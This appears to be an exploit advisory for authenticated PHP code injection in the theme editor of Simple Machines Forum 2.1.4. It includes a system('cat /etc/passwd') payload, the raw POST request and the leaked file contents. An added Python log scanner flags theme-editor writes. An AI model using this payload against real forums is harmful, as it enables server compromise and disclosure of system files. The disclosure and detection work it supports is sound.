Simple Machines Forum 2.1.4 Code Injection exploit

## https://sploitus.com/exploit?id=PACKETSTORM:180255
# Exploit Title: Authenticated Code Injection - smfv2.1.4
# Date: 8/2024
# Exploit Author: Andrey Stoykov
# Version: 2.1.4
# Tested on: Ubuntu 22.04
# Blog: https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html

Code Injection Authenticated:

Steps to Reproduce:

1. Login as admin
2. Browse to "Current Theme"
3. Click on "Modify Themes" > "SMF Default Theme"
4. Click on Admin.template.php
5. In the first box enter the PHP payload "<?php system('cat /etc/passwd') ?>"

// HTTP POST request showing the code injection payload

POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
[...]

entire_file[]=<?php+system('cat /etc/passwd') ?>[...]

// HTTP response showing /etc/passwd contents

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
[...]

[...]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]
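
Detection side of the request above, as an added example that is not part of the original advisory: a Python pass over web server access logs that flags every POST to the theme editor endpoint (action=admin, area=theme, sa=edit). It assumes Apache combined log format; the /forum/ path, addresses and log lines are constructed. Access logs do not record the POST body, so each hit marks a template write to review against the file on disk, not a confirmed payload.

```python
import re
from urllib.parse import unquote

# Apache combined log format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def smf_params(target):
    """Parse the query string of a request target into a dict.

    The advisory's request separates parameters with ';', which '&'-only
    parsers treat as one value. Splitting on '&' too is an assumption.
    """
    query = target.partition("?")[2]
    params = {}
    for pair in re.split(r"[;&]", query):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key).lower()] = unquote(value)
    return params

def find_theme_edits(lines):
    """Return (ip, timestamp, theme_id, status) for each theme-editor save."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # GET only opens the editor; POST writes the template
        p = smf_params(m["target"])
        if (p.get("action"), p.get("area"), p.get("sa")) == ("admin", "theme", "edit"):
            hits.append((m["ip"], m["ts"], p.get("th"), int(m["status"])))
    return hits

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Aug/2024:10:01:02 +0000] "GET /forum/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Aug/2024:10:01:40 +0000] "POST /forum/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Aug/2024:10:02:11 +0000] "POST /forum/index.php?action=post2;board=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Aug/2024:10:03:00 +0000] "POST /forum/index.php?action=admin&area=theme&sa=edit&th=2 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_theme_edits(SAMPLE_LOG):
        print("theme template write:", hit)
```

Legitimate theme edits by an administrator match as well, so correlate hits with change records and with the modification times of the files under the theme directory.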